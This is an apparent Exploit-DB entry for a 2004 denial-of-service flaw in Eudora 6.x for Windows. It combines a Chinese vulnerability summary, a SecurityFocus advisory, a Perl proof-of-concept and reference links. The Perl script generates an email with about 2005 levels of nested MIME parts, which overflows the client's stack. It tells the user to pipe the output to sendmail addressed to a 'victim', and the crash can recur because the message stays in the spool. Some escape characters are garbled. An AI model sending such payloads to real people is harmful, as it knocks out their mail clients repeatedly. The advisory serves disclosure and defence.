https://www.exploit-db.com/exploits/24000
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-026

Windows中的Eudora6.1和6.0.3版本存在漏洞。远程攻击者通过深嵌套的多部分MIME信息导致服务拒绝（崩溃）。

source: http://www.securityfocus.com/bid/10137/info

It has been reported that Eudora is prone to a denial of service vulnerability when handling e-mail containing excessive MIME nesting. The problem is known to occur when the application attempts to decode the deeply nested message.

Successful exploitation of this issue may allow an attacker to cause the application to crash due to corruption of stack memory. It is not known if this issue is further exploitable to execute arbitrary code.

It should be noted that this condition may be persistent since the offending message may remain in the client's mail spool.

Eudora 6.0.3 is reported to be vulnerable to this issue, however, other versions may be affected as well.

#!/usr/bin/perl --

print "From: men";
print "To: youn";
print "Subject: nested multipart testn";
print "Mime-Version: 1.0n";
print "X-Use: Pipe the output of this script into:  sendmail -i victimn";

&nest(0);
print "n";

sub nest {
  my ($x) = @_;
  my $b = sprintf("bndry%04d",$x);
  print "Content-Type: multipart/mixed; boundary="$b"nn";
  print "--$bn";
  print "Content-Type: text/plainnn";
  print "Level $xnn";

# No problem for 1995, but crash for 2005 deep nesting:
#
# (378.1c4): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000
# eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010202
# ntdll!LdrLoadAlternateResourceModule+9:
# 77f862ed 53               push    ebx

  if ($x < 2005) {
    print "--$bn";
    &nest($x+1);
  }
  print "--$bn";
  print "Content-Type: text/plainnn";
  print "Final $xn";
  print "--$b--nn";
}

来源:XF
名称:eudora-mime-message-dos(15857)
链接:http://xforce.iss.net/xforce/xfdb/15857
来源:BID
名称:10137
链接:http://www.securityfocus.com/bid/10137
来源:SECUNIA
名称:11360
链接:http://secunia.com/advisories/11360
来源:BUGTRAQ
名称:20040419Eudora6.1isevil
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108241694627321&w;=2
来源:FULLDISC
名称:20040414Eudora6.0.3nestedMIMEDoS
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020075.html